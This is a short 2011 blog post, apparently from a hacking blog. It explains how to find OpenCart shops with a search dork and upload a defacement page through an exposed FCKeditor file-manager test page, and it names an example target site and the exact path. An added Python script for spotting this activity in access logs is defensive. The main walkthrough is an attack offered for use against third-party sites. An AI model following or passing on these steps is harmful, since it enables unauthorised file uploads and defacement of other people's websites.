3/8/11
dork : Powered By OpenCart site:com
The "site:" value is up to you; what matters is that the site runs OpenCart.
ex target: http://iphoneclone.biz/
Once you've got a target, go straight to the exploit.
exploit :
admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
So it ends up like this:
ex: http://iphoneclone.biz/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
Look at the page that comes up; it has a file upload form.
For the connector, choose PHP.
Then just upload our deface HTML file.
If it works, an alert like this appears:
"file uploaded with no errors"
Check whether our file was uploaded by clicking "Get Folders and Files".
Ta-daaa....!!!!!!
ex result: http://iphoneclone.biz/c u p u.html
Unfortunately, the file we upload can't overwrite an existing file; it gets saved as a duplicate instead: file(1).html or file(2).html.
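An added example, not part of the original post: a Python sketch a site owner could run over a web server access log to spot the activity described above (requests served from the FCKeditor connectors directory, and fetches of `name(N).html` duplicates). The log lines are constructed, and the combined log format, the `php/connector.php` path in the sample and the tag names are assumptions made for this example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Directory from the post; every file-manager connector lives beneath it.
CONNECTOR_DIR = "/admin/view/javascript/fckeditor/editor/filemanager/connectors/"
# Assumed combined log format: client, method, target, status.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Duplicate naming the post describes: file(1).html, file(2).html ...
DUP_RE = re.compile(r"\(\d+\)\.html?$", re.IGNORECASE)

def scan(lines):
    """Map each client IP to the sorted finding tags seen for it."""
    findings = defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        ip, method, target, status = m.groups()
        if not status.startswith("2"):
            continue  # ignore requests the server refused or could not find
        path = unquote(target.split("?", 1)[0])  # %281%29 -> (1)
        if path.startswith(CONNECTOR_DIR):
            if path.endswith("/test.html"):
                findings[ip].add("test-page-served")
            if method == "POST":
                findings[ip].add("connector-post")
        elif method == "GET" and DUP_RE.search(path):
            findings[ip].add("duplicate-named-html")
    return {ip: sorted(tags) for ip, tags in findings.items()}

# Constructed sample lines using documentation-range addresses.
PFX = "/admin/view/javascript/fckeditor/editor/filemanager/connectors"
SAMPLE = [
    f'203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET {PFX}/test.html HTTP/1.1" 200 5120',
    f'203.0.113.7 - - [01/Jan/2024:10:00:40 +0000] "POST {PFX}/php/connector.php HTTP/1.1" 200 310',
    '203.0.113.7 - - [01/Jan/2024:10:01:05 +0000] "GET /index%281%29.html HTTP/1.1" 200 900',
    f'198.51.100.9 - - [01/Jan/2024:10:02:00 +0000] "GET {PFX}/test.html HTTP/1.1" 404 210',
    '198.51.100.20 - - [01/Jan/2024:10:03:00 +0000] "GET /index.php?route=common/home HTTP/1.1" 200 8000',
]

if __name__ == "__main__":
    for ip, tags in scan(SAMPLE).items():
        print(ip, ", ".join(tags))
```

A `test-page-served` hit means the server returned the connector test page to that client; restricting access to the connectors directory is the fix to verify next.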
Labels: web hacking